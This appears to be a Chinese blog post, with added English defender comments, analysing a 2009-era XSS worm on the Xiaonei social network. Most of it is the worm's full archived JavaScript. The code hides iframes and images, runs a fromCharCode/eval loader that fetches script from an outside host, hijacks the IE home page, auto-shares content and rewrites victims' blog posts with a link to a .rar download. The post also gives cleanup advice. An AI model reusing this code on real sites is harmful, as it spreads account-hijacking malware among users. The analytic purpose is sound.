本日志只研究了
英国人疯了。。出的什么题目啊!!!!
http://blog.xiaonei.com/GetEntry.do?id=343568285&owner=221076834 (*DO NOT FOLLOW THIS LINK*)
实际产生作用的应该是日志尾部的这么几行代码:
<!-- Archived injected markup, as transcribed in the post. The 0x0 image and the
     hidden <div> load remote content without rendering anything visible; the
     <script> element loads a remote ".asx" file as JavaScript (the extension is
     irrelevant to the browser — the content is what runs). Defender note: a
     post body that may contain <script src=...> or external 0x0 images is the
     injection point here; the fix is server-side HTML sanitisation of posts. -->
<img width="0" height="0" src="http://xss0211.111.no1date.cn/s.php"/>
<script ik="myyoumin" src="http://fmn029.xnimg.cn/fmn029/tribe/20090316/07/30/A087039690816UPL.asx" type="text/javascript">
</script>
</p>
<br/>
<!-- "display" is not an <img> attribute (the element is 0x0 anyway), and the
     ".com.f" host does not resolve — the post's author suggests it is a typo. -->
<div height="0"> <img id="mydoit" width="0" height="0" src="http://static.xiaonei.com.f/img/temp/fm/20090219.jpg" display="none"/>
</div>
第一个地址应该是包含了跨站攻击脚本(XSS),但是这个地址(no1date.cn)已经无法解析了。
第二个链接含有一个伪造的asx文件,其中包含代码:
// Stage-2 loader as transcribed from the fake .asx file: creates a <script>
// element whose src is a ".jpg" URL (the response is JavaScript, not an image)
// and appends it to <head>. Defender note: script fetched from an image URL is a
// content-type mismatch a proxy or CSP (script-src) can catch.
var l=document.createElement("script");
// NOTE(review): the quotes around the URL were presumably lost in transcription;
// as written this line would not parse as a string assignment.
l.src=http://love.avtupian.com/a/x/xOO1.jpg; //Don’t follow this link
l.type="text/javascript";
document.getElementsByTagName("head").item(0).appendChild(l);
链接的图片实际是一段JavaScript代码,全文在最后,应该与浏览器的漏洞有关。
作用有自动分享,并修改日志,最后还会记录访问者IP。其中还是有几个网址不能解析,故无法分析其作用。
这个图片仍旧存在,请不要点击上面的链接。
第三个地址的图片也无法打开,看其地址(.com.f),可能是写错了。
结论:本想知道这只是一个单纯的XSS攻击还是会往你的计算机上安插木马,现在仍旧不能确定。
保险起见可参照那个
校内网被挂马,有效解决方案
http://blog.xiaonei.com/GetEntry.do?id=396704329&owner=225886057
查杀一下。如果没有在系统中发现上贴所述文件和注册表项,也不用太担心。
但最重要的是,请运行Windows Update为系统特别是IE打上补丁。
实际上,推荐使用非IE内核浏览器,比如Firefox, Google Chrome, Opera, Safari。
最后是攻击代码存档,来自前述的xOO1.jpg:
// Silences every script error on the page: returning true from window.onerror
// marks the error as handled, so any failing step of the payload leaves no
// visible trace (no error dialog in the IE of the period).
function killErrors() {return true;}
window.onerror=killErrors;
// IE-only: the "#default#homepage" DHTML behavior exposes setHomePage() on the
// element, which here points the browser home page at a baidu URL carrying a
// referral tag ("tn=haijin0212_pg"). Other engines ignore style.behavior and
// have no setHomePage(), so this throws there (and is then swallowed above).
function defaul_home(aaa){
aaa.style.behavior='url(#default#homepage)';
aaa.setHomePage('http://www.baidu.com/index.php?tn=haijin0212_pg');
}
// Calls defaul_home() up to nine times on the given element unless window.xxx
// is already 1, then sets window.xxx=1 so later calls do nothing. The loop
// index i is an implicit global. The onclick hook that would invoke this is
// commented out just below, so this branch appears inactive in the archive.
function hit(aaa){
for(i=1;i<10;i++){
if(window.xxx!=1){
defaul_home(aaa);
}
}
window.xxx=1;
}
//document.all.blogpage.onclick=Function("hit(document.all.blogpage)");
//----------------------------
// State for the auto-share stage. mydata is filled in by getinfo(); the global
// mylink is shadowed by a local of the same name inside getinfo() and is not
// referenced anywhere else in the archived copy.
var mydata;
var mylink="http://love.avtupian.com/a/x/qiaoye.html";
// Runs at load time; getinfo is a function declaration, so it is hoisted.
getinfo();
// Reads the share-form fields of the page the victim is viewing (elements with
// ids link, type, title, pic, fromno, fromname, fromuniv, albumid, largeurl and
// the text of #summary) and serialises them into a URL-encoded, JSON-shaped
// "post={...}" body held in the global mydata — presumably the format the
// site's share endpoint expects (the closing %22%7D is added later in s.jpg).
// Note the mix of escape() and encodeURIComponent() per field and the final
// re-encoding of "/" as %2F. Defender note: everything here is read from the
// victim's own DOM, so the resulting share is indistinguishable from a
// legitimate one at the HTTP level; only the timing/volume pattern stands out.
function getinfo(){
var mylink=document.getElementById("link").value;
var mytype=document.getElementById("type").value;
var mytitle=document.getElementById("title").value;
var mypic=document.getElementById("pic").value;
var myfromno=document.getElementById("fromno").value;
var myfromname=document.getElementById("fromname").value;
var myfromuniv=document.getElementById("fromuniv").value;
var myalbumid=document.getElementById("albumid").value;
var mysummary=document.getElementById("summary").innerText;
mydata='post=%7B%22link%22%3A%22'+escape(mylink);
mydata+='%22%2C%22type%22%3A%22'+escape(mytype);
mydata+='%22%2C%22title%22%3A%22'+encodeURIComponent(mytitle);
mydata+='%22%2C%22pic%22%3A%22'+escape(mypic);
mydata+='%22%2C%22fromno%22%3A%22'+escape(myfromno);
mydata+='%22%2C%22fromname%22%3A%22'+encodeURIComponent(myfromname);
mydata+='%22%2C%22fromuniv%22%3A%22'+encodeURIComponent(myfromuniv);
mydata+='%22%2C%22albumid%22%3A%22'+escape(myalbumid);
mydata+='%22%2C%22largeurl%22%3A%22'+escape(mylargeurl);
mydata+='%22%2C%22summary%22%3A%22'+encodeURIComponent(mysummary);
mydata=mydata.replace(/\//g,'%2F');
}
// Appends a 0x0 iframe loading share.xiaonei.com's ajaxProxy.html into #logo,
// then schedules appendjs() 2.6 s later — presumably to give the frame time to
// load. appendjs() scripts into that frame's document, which only works if the
// two documents are treated as the same origin (probably via document.domain on
// the host site — cannot be confirmed from this archive).
document.getElementById("logo").innerHTML+='<iframe name=do_it id=do_it src="http://share.xiaonei.com/ajaxProxy.html?ver=2" width=0 height=0></iframe>';
setTimeout("appendjs()",2600);
// Replaces the hidden frame's body with two elements: an <img> whose src is a
// presumably bogus host ("r.dd", with Math.random() as a cache-buster) so its
// onerror fires, and that handler eval()s a String.fromCharCode() sequence —
// decoded at the end of the post, it appends a <script> loading .../a/x/s.jpg
// into <head>; plus <div id=eer> carrying mydata so s.jpg can read it from the
// DOM. document.frames() is IE-only. Defender note: fromCharCode-to-eval inside
// an onerror attribute is a classic obfuscation pattern worth a detection rule.
function appendjs(){
document.frames("do_it").document.getElementsByTagName("body").item(0).innerHTML='<img src="http://r.dd/EE?E='+Math.random()+'" onerror="eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div id=eer name=eer>'+mydata+'</div>';
}
//===============================================================================================
// Globals for the blog-modification stage (title/body of the post to rewrite,
// scraped post URLs/ids, response buffers).
var mytitle;var mybody;var mytsc;var myid;var userurl;var guest;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();var b_index;
var guest2;
// The visitor's own user id is taken from the first link under #logo: the
// substring after "?id=" in its href. $ is presumably the host page's
// Prototype.js (Ajax.Request is used below) rather than something the payload
// ships itself.
var visitorID=$("logo").firstChild.firstChild.href;
var IDs=visitorID.indexOf("?id=");
visitorID=visitorID.substring(IDs+4);
var mydomain=document.location.href;
var mydomaint=mydomain.indexOf("blog.xiaonei.com");
var myo=mydomain.indexOf(visitorID);
// Proceeds only on blog.xiaonei.com and only when the current URL does not
// contain the visitor's id — apparently "viewing someone else's blog". The
// next stage starts 400 ms later.
if(mydomaint!=-1&&myo==-1){setTimeout("get_my_blogurl()",400);}
// Fetches the visitor's own blog index (MyBlog.do) with the victim's session
// via a Prototype Ajax.Request; both completion and failure route to
// add_my_blogurl. Returns the request object (unused by callers here).
function get_my_blogurl(){
var as=new Ajax.Request("http://blog.xiaonei.com/MyBlog.do",{method:"get",onComplete:add_my_blogurl,onFailure:add_my_blogurl});
return as;
}
// Scrapes up to ten entry links out of the MyBlog.do HTML by repeatedly
// searching for the '<strong><a href="http://blog.xiaonei.com/GetEntry.do?id='
// marker: each href goes into myblogurl[i] and the id between "?id=" and
// "&owner" into myblogid[i]; stops at the first miss, then calls
// get_my_testself(). The loop index i is an implicit global.
// substring(0,myurls-1) drops the character before the closing quote — cannot
// tell from here whether that is deliberate; the id extraction only needs
// "&owner" to still be present.
function add_my_blogurl(r){
var mybloglist=r.responseText;
var myurls;var blogids;var blogide;
for(i=0;i<10;i++){
myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
//mybloglist=mybloglist.substring(myurls+10);
//myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
if(myurls!=-1){
mybloglist=mybloglist.substring(myurls);
myurls=mybloglist.indexOf('"');
mybloglist=mybloglist.substring(myurls+1);
myurls=mybloglist.indexOf('"');
myblogurl[i]=mybloglist.substring(0,myurls-1);mybloglist=mybloglist.substring(myurls+1);
blogids=myblogurl[i].indexOf("?id=");blogide=myblogurl[i].indexOf("&owner");
myblogid[i]=myblogurl[i].substring(blogids+4,blogide);
//document.getElementById("blogContent").innerHTML+="<br><a href=eee.com >i="+i+";</a>"+myblogid[i];
}else{break;}
}
get_my_testself();
}
//-------------------------------------
// For each scraped post id, synchronously GETs its edit page (EditEntry.do)
// and selects the first one whose HTML does not contain "skycn" — the marker
// text that add_my_form appends — so a post is modified at most once. The
// chosen post's edit-page HTML stays in the global guest2 for add_my_form.
// Defender note: "skycn" in a post body is a usable indicator of a post this
// worm already rewrote; the burst of synchronous EditEntry.do GETs per page
// view is the server-side signature.
function get_my_testself(){
targetblogurlid=0;
for(i=0;i<myblogid.length;i++){
//var url="http://blog.xiaonei.com/GetEntry.do?id="+myblogid[i]+"&owner="+visitorID;
var url="http://blog.xiaonei.com/EditEntry.do?id="+myblogid[i];
var xhr2=createXMLHttpRequest();
if(xhr2){
xhr2.open("GET",url,false);
xhr2.send();guest2=xhr2.responseText;
}
var mycheckit=guest2.indexOf("skycn");
if(mycheckit==-1){targetblogurlid=myblogid[i];b_index=i;break;}
}
if(targetblogurlid!=0){add_my_form(targetblogurlid);}
}
//---------------------------------------------------------------add--form
// Extracts the current title (the value="..." after name="title") and body
// (the textarea after name="body", via a hard-coded +30 offset that assumes a
// fixed attribute layout) from the edit-page HTML in guest2, appends a
// promotional paragraph linking to a .rar download (the "skycn" marker) to the
// body, URL-encodes both and calls myxiugai() to save. The parameter r is unused.
// NOTE(review): as archived, each replace() chain maps a character to itself
// ('&'→'&', '"'→'\"' which is just '"', etc.), i.e. it is a no-op; presumably
// these were HTML-entity decodes whose entity text (&amp; &quot; &lt; &gt;)
// was lost when the post was rendered. Cannot confirm from this copy.
function add_my_form(r){
guest=guest2;
var texts=guest.indexOf('name="title"');
guest=guest.substring(texts);
var titles=guest.indexOf('value="');
var titlee=guest.indexOf('" />');
mytitle=guest.substring(titles+7,titlee);
mytitle=mytitle.replace(/&/g,'&').replace(/"/g,'\"').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
mytitle=encodeURI(mytitle);
guest=guest.substring(titlee);
var bodys=guest.indexOf('name="body"');
var bodye=guest.indexOf('</textarea>');
mybody=guest.substring(bodys+30,bodye);
mybody=mybody.replace(/&/g,'&').replace(/"/g,'\"').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
mybody+='<p><br>最后推荐一个东西:<br><br>发现了好软件,QQ千里眼,能够强制与任何QQ视频,能够强制加好友,强制聊天,迫使下线!<br>下载地址:<a href="http://tan.itwenba.cn/qq/QQqianliyan.rar" target=_blank >天空下载中心:skycn</a></p>';
mybody=encodeURI(mybody);
myxiugai();
}
// Saves the rewritten post: a synchronous x-www-form-urlencoded POST to
// EditEntry.do with the encoded title/body, owner=visitorID and id=the chosen
// post. "/" is re-encoded as %2F and encoded tabs (%09) and CRLFs (%0D%0A)
// are stripped first. Field names, including "passwordProtedted", are left
// exactly as archived. Defender note: the write rides the victim's own
// session; a per-request anti-CSRF token would not have stopped it, since
// injected same-origin script can fetch one (s.jpg does exactly that for the
// share flow) — the control that matters is preventing script injection into
// post content.
function myxiugai(){
userurl="http://blog.xiaonei.com/EditEntry.do";
var fdata="title="+mytitle+"&body="+mybody+"&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=0&pic_path=&owner="+visitorID+"&relative_optype=&id="+targetblogurlid;
var xhr=createXMLHttpRequest();
fdata=fdata.replace(/\//g,'%2F');
fdata=fdata.replace(/%09/g,'');
fdata=fdata.replace(/%0D%0A/g,'');
if(xhr){
xhr.open("POST",userurl,false);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send(fdata);
}
}
//--------------------------------
// XHR factory of the period: native XMLHttpRequest where available, otherwise
// the first MSXML ActiveX ProgID from the list that constructs; construction
// errors are swallowed. Returns null when nothing worked (callers check this).
function createXMLHttpRequest(){
var XMLhttpObject=null;
if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}
else
{ var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];
for(var i=0;i<MSXML.length;i++)
{
try
{
XMLhttpObject=new ActiveXObject(MSXML[i]);
break;
}
catch (ex) {
}
}
}
return XMLhttpObject;
}
//---------------------------------------
// 200 ms after load, appends a 0x0 iframe loading ip.asp on the payload host
// into the #optiondropdownMenu element; the post's author reads this as
// recording the visitor's IP. insertAdjacentHTML with a raw string is the
// IE-era way to inject markup. Defender note: an outbound request from a
// xiaonei.com page to this host is the network-level indicator of infection.
setTimeout("myshua()",200);
function myshua(){
document.getElementById("optiondropdownMenu").insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://love.avtupian.com/ip.asp'></iframe>");
}
//注:String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div
的转换结果为
// Decoded form of the String.fromCharCode() payload eval()ed in appendjs():
// injects a <script> loading .../a/x/s.jpg (JavaScript served under an image
// name) into <head>. Same loader pattern as the .asx stage.
var s=document.createElement('script'); s.src='http://love.avtupian.com/a/x/s.jpg'; s.type='text/javascript'; document.getElementsByTagName('head').item(0).appendChild(s);
s.jpg所含代码为:(作用应该是提交分享)
// s.jpg entry point: reads the serialised share payload that appendjs() left
// in <div id=eer> (document.all is IE-era) and runs get_tsc() once, guarded by
// window.sss so re-execution does not re-share.
var sdata;var guest;
sdata=document.all.eer.innerHTML;
if(!window.sss){
get_tsc();
window.sss=1;
}
// Two synchronous same-origin POSTs to share.xiaonei.com with the victim's
// cookies. First popup.do receives the payload closed with %22%7D ('"}') and
// its HTML is scraped for the quoted value following "tsc_popShare" — the
// share token. Then submit.do receives tsc=<token> plus the payload extended
// with sendcomment=on, action=add, auth=99 and an empty body, which performs
// the share. The second `var url` is a redeclaration (var is function-scoped),
// so it just reassigns. Defender note: the token is readable by any script
// running on the site, so it defends against cross-site forgery only, not
// against injected script — the burst pattern (popup.do immediately followed
// by submit.do with no user interaction) is what a server-side detection can key on.
function get_tsc(){
var xhr=createXMLHttpRequest();
var url;var guest;
var tdata=sdata+'%22%7D';
url="http://share.xiaonei.com/share/popup.do";
if(xhr){
xhr.open("POST",url,false);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send(tdata);guest=xhr.responseText;
}
var indexs=guest.indexOf("tsc_popShare");
guest=guest.substring(indexs+13);
indexs=guest.indexOf('"');
guest=guest.substring(indexs+1);
indexs=guest.indexOf('"');
guest=guest.substring(0,indexs);
var mytsc=guest;
tdata="";
tdata=sdata;
tdata+='%22%2C%22sendcomment%22%3A%22on%22%2C%22action%22%3A%22add%22%2C%22auth%22%3A%2299%22%2C%22body%22%3A%22';
tdata+='';
tdata+='%22%7D';
tdata="tsc="+mytsc+"&"+tdata;
var url="http://share.xiaonei.com/share/submit.do";
if(xhr){
xhr.open("POST",url,false);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send(tdata);guest=xhr.responseText;
}
}
// Byte-identical copy of the createXMLHttpRequest factory from xOO1.jpg above;
// s.jpg presumably carries its own so it works even if loaded on its own.
// Native XMLHttpRequest first, otherwise the first MSXML ProgID that
// constructs; errors swallowed; null if none worked.
function createXMLHttpRequest(){
var XMLhttpObject=null;
if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}
else
{ var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];
for(var i=0;i<MSXML.length;i++)
{
try
{
XMLhttpObject=new ActiveXObject(MSXML[i]);
break;
}
catch (ex) {
}
}
}
return XMLhttpObject;
}